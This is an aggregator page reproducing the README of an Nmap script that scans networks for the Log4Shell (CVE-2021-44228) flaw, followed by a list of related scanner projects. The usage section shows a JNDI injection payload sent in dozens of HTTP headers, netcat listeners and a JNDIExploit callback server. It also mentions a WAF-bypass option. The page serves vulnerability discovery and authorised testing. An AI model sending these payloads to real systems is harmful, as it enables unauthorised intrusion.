GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → giterlizzi → nmap-log4shell

giterlizzi / nmap-log4shell

Licence: MIT license
Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)

Programming Languages

lua
6591 projects

Labels

log4jnmapvulnerabilitynmap-scriptscve-2021-44228log4shell

Projects that are alternatives of or similar to nmap-log4shell

log4jscanwin
Log4j Vulnerability Scanner for Windows
Stars: ✭ 142 (+162.96%)
Mutual labels:  log4j, vulnerability, cve-2021-44228, log4shell
log4shell-finder
Fastest filesystem scanner for log4shell (CVE-2021-44228, CVE-2021-45046) and other vulnerable (CVE-2017-5645, CVE-2019-17571, CVE-2022-23305, CVE-2022-23307 ... ) instances of log4j library. Excellent performance and low memory footprint.
Stars: ✭ 22 (-59.26%)
Mutual labels:  log4j, vulnerability, cve-2021-44228, log4shell
log4shelldetect
Rapidly scan filesystems for Java programs potentially vulnerable to Log4Shell (CVE-2021-44228) or "that Log4j JNDI exploit" by inspecting the class paths inside files
Stars: ✭ 40 (-25.93%)
Mutual labels:  log4j, cve-2021-44228, log4shell
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (+94.44%)
Mutual labels:  nmap, vulnerability, nmap-scripts
Vulscan
Advanced vulnerability scanning with Nmap NSE
Stars: ✭ 2,305 (+4168.52%)
Mutual labels:  nmap, vulnerability, nmap-scripts
log4j-cve-2021-44228
Ansible detector scanner playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 Remote Code Execution - log4j (CVE-2021-44228)
Stars: ✭ 58 (+7.41%)
Mutual labels:  log4j, cve-2021-44228, log4shell
Log4j-RCE-Scanner
Remote command execution vulnerability scanner for Log4j.
Stars: ✭ 200 (+270.37%)
Mutual labels:  log4j, cve-2021-44228, log4shell
HackLog4j
《HackLog4j-永恒之恶龙》致敬全宇宙最无敌的Java日志库!Tribute to the most invincible Java logging library in the universe!
Stars: ✭ 161 (+198.15%)
Mutual labels:  log4j, cve-2021-44228, log4shell
awesome-log4shell
An Awesome List of Log4Shell resources to help you stay informed and secure! 🔒
Stars: ✭ 194 (+259.26%)
Mutual labels:  log4j, vulnerability, log4shell
Log4jPatcher
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)
Stars: ✭ 43 (-20.37%)
Mutual labels:  log4j, cve-2021-44228, log4shell
safelog4j
Safelog4j is an instrumentation-based security tool to help teams discover, verify, and solve log4shell vulnerabilities without scanning or upgrading
Stars: ✭ 38 (-29.63%)
Mutual labels:  log4j, vulnerability, log4shell
log4jshield
Log4j Shield - fast ⚡, scalable and easy to use Log4j vulnerability CVE-2021-44228 finder and patcher
Stars: ✭ 13 (-75.93%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4shell-tools
Tool that runs a test to check whether one of your applications is affected by the recent vulnerabilities in log4j: CVE-2021-44228 and CVE-2021-45046
Stars: ✭ 55 (+1.85%)
Mutual labels:  log4j, cve-2021-44228, log4shell
cloudrasp-log4j2
一个针对防御 log4j2 CVE-2021-44228 漏洞的 RASP 工具。 A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.
Stars: ✭ 105 (+94.44%)
Mutual labels:  log4j, vulnerability, cve-2021-44228
log4j-detector
Log4J scanner that detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find Log4J instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too!
Stars: ✭ 622 (+1051.85%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4jpwn
log4j rce test environment and poc
Stars: ✭ 306 (+466.67%)
Mutual labels:  log4j, cve-2021-44228, log4shell
log4j-scanner
log4j-scanner is a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.
Stars: ✭ 1,212 (+2144.44%)
Mutual labels:  log4j, cve-2021-44228
log4j-sniffer
A tool that scans archives to check for vulnerable log4j versions
Stars: ✭ 180 (+233.33%)
Mutual labels:  log4j, cve-2021-44228
CVE-2021-44228-PoC-log4j-bypass-words
🐱‍💻 ✂️ 🤬 CVE-2021-44228 - LOG4J Java exploit - WAF bypass tricks
Stars: ✭ 760 (+1307.41%)
Mutual labels:  log4j, cve-2021-44228
awesome-list-of-secrets-in-environment-variables
🦄🔒 Awesome list of secrets in environment variables 🖥️
Stars: ✭ 538 (+896.3%)
Mutual labels:  log4j, cve-2021-44228
View All Similar Projects ➔

Nmap Log4Shell NSE script for discovery Apache Log4j RCE (CVE-2021-44228)

nmap-log4shell is a NSE script for discovery Apache Log4j RCE (CVE-2021-44228) vulnerability across the network. The script is able to inject the log4shell exploit payload via HTTP Headers (default) or via TCP/UDP socket.

Vulnerability

CVE-2021-44228 is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:

  • Lightweight Directory Access Protocol (LDAP)
  • Secure LDAP (LDAPS)
  • Remote Method Invocation (RMI)
  • Domain Name Service (DNS)

If the vulnerable server uses log4j to log requests, the exploit will then request a malicious payload over JNDI through one of the services above from an attacker-controlled server. Successful exploitation could lead to RCE.

Installation

Locate where your nmap scripts are located on your system:

  • for *nix system it might be ~/.nmap/scripts/ or $NMAPDIR
  • for Mac it might be /usr/local/Cellar/nmap/<version>/share/nmap/scripts/
  • for Windows it might be C:\Program Files (x86)\Nmap\scripts

Copy the provided script (log4shell.nse) into that directory run nmap --script-updatedb to update the nmap script DB.

Usage

nmap --script log4shell.nse --script-args log4shell.callback-server=172.17.42.1:1389 -p 8080 172.17.42.2 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:26 CET
Nmap scan report for 172.17.42.1
Host is up (0.000096s latency).

PORT     STATE SERVICE
8080/tcp open  http-proxy
| log4shell: 
|   Payloads:
|     ${jndi:ldap:/172.17.42.1:389/log4shell}
|   Test Method: HTTP
|   URL Path: /
|   HTTP Method: GET
|   HTTP Headers: 
|     Access-Control-Request-Method: 200 
|     Accept: 200 
|     Access-Control-Request-Headers: 200 
|     Accept-Charset: 200 
|     X-Api-Version: 200 
|     Warning: 200 
|     Pragma: 200 
|     Upgrade-Insecure-Requests: 200 
|     Range,: 400 
|     Hostname: 200 
|     Content-Length: 400 
|     Dnt: 200 
|     Date: 200 
|     Username: 200 
|     Content-Encoding: 200 
|     Content-Type: 200 
|     Forwarded: 200 
|     Max-Forwards: 200 
|     Accept-Encoding: 200 
|     Referer: 200 
|     IP: 200 
|     IPaddress: 200 
|     X-Amz-Date: 200 
|     X-Amz-Target: 200 
|     TE: 200 
|     Content-Disposition: 200 
|     X-Requested-With: 200 
|     upgrade-insecure-requests: 200 
|     Authorization: 200 
|     Cookie: 200 
|     User-Agent: 200 
|     Accept-Language: 200 
|     Proxy-Authorization: 200 
|     Expect: 417 
|     From: 200 
|     Accept-Datetime: 200 
|     X-CSRF-Token: 200 
|     Origin: 200 
|_  Note: (!) Inspect the callback server (172.17.42.1:389) or web-application (172.17.42.2:8080) logs

Arguments

  • log4shell.callback-server: The callback server (eg. 172.17.42.1:1389)
  • log4shell.http-headers: Comma-separated list of HTTP headers (eg. X-Api-Version,User-Agent,Referer)
  • log4shell.http-method: HTTP method (default: GET)
  • log4shell.url-path: URL path (default: /)
  • log4shell.waf-bypass: Use WAF bypass payloads (default: false)
  • log4shell.test-method: Test through http (default), tcp, udp or all

Callback Server

The script relies on callbacks from the target being scanned and hence any firewall rules or interaction with other security devices will affect the efficacy of the script.

Netcat or Ncat

Listen a TCP port with netcat (or ncat):

ncat -vkl 1389   # Ncat
nc -lvnp 1389    # Netcat

Run Nmap with --script log4shell.nse script

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

See the target IP address in netcat (or ncat) output:

Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:38898.

JNDIExploit

Download JNDIExploit from GitHub (https://github.com/giterlizzi/JNDIExploit/releases/download/v1.2/JNDIExploit.zip)

Start JNDIExploit server:

java -jar JNDIExploit.jar

Run Nmap with --script log4shell.nse script

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p <port>] <target>

See JNDIExploit output for see the received LDAP query

[+] Received LDAP Query: log4shell
[!] Invalid LDAP Query: log4shell

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of nmap-log4shell for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

License

The project is licensed under MIT License.

Author

  • Giuseppe Di Terlizzi (giterlizzi)
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].